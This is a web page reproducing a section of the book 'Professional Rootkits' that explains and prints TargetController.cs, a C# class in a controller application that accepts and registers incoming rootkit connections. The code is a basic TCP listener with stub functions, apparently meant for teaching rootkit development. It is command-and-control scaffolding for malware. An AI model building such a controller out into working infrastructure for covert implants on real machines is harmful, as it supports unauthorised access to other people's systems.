TargetController.cs


The file TargetController.cs contains a single class, TargetController, with the following member functions:

  • TargetController (constructor)–Initializes an instance, one for each connection

  • Start–Processes an incoming connection

  • Ping–A stub function. In an actual controller it would verify the connection.

  • Stop–Closes the connection

One instance of the TargetController class is created for each new rootkit connection. The class is responsible for processing the initial connection. This class would also contain the link control logic in an actual controller.

  // TargetController.cs // Copyright Ric Vieler, 2006 // This file supports rootkit communications using System; using System.Net; using System.Net.Sockets; using System.Threading; using System.Globalization; namespace GhostTracker {  /// <summary>  /// Summary description for TargetController.  /// </summary>  public class TargetController  {   string targetAddress = "";   MainForm mainFormPtr;   TcpClient myClient;   public TargetController( MainForm parent, TcpClient client )   {    mainFormPtr = parent;    myClient = client;   }   /// <summary>   /// Handle a single Ghost connections   /// </summary>   public void Start()   {    try    {     Int32 bytesRead;     // Buffer for reading data     Byte[] bytes = new Byte[1024];     String data = "";     // Get a stream object for reading and writing     NetworkStream stream = myClient.GetStream();     // receive the data sent by the client.     while( true )     {      if( !stream.DataAvailable )      {       Thread.Sleep(20);       continue;      }      bytesRead = stream.Read( bytes, 0, bytes.Length );      // Translate data bytes to a ASCII string.      data = System.Text.Encoding.ASCII.GetString( bytes, 0, bytesRead );      // Process the data sent by the client.      if( targetAddress.Length == 0 )      {       // Initial data is always the target's IP address       // Send to GhostTracker with target information       DateTime time = DateTime.Now;       targetAddress = data;       mainFormPtr.AddTarget( this, targetAddress,        " Connected " + time.ToString( "G" ) );       continue;      }      // Process reviewed data      Thread.Sleep( 20 );     }    }    catch( ThreadAbortException )    {     // Application is shutting down    }   }   public bool Ping()   {    return( true );   }   /// <summary>   /// Clean up any resources being used.   /// </summary>   public void Stop()   {    // Shutdown the connection    myClient.Close();   }  } } 




Professional Rootkits
Professional Rootkits (Programmer to Programmer)
ISBN: 0470101547
EAN: 2147483647
Year: 2007
Pages: 229
Authors: Ric Vieler

Similar book on Amazon
Rootkits: Subverting the Windows Kernel
Rootkits: Subverting the Windows Kernel
A Guide to Kernel Exploitation: Attacking the Core
A Guide to Kernel Exploitation: Attacking the Core
Reversing: Secrets of Reverse Engineering
Reversing: Secrets of Reverse Engineering
Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code
Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net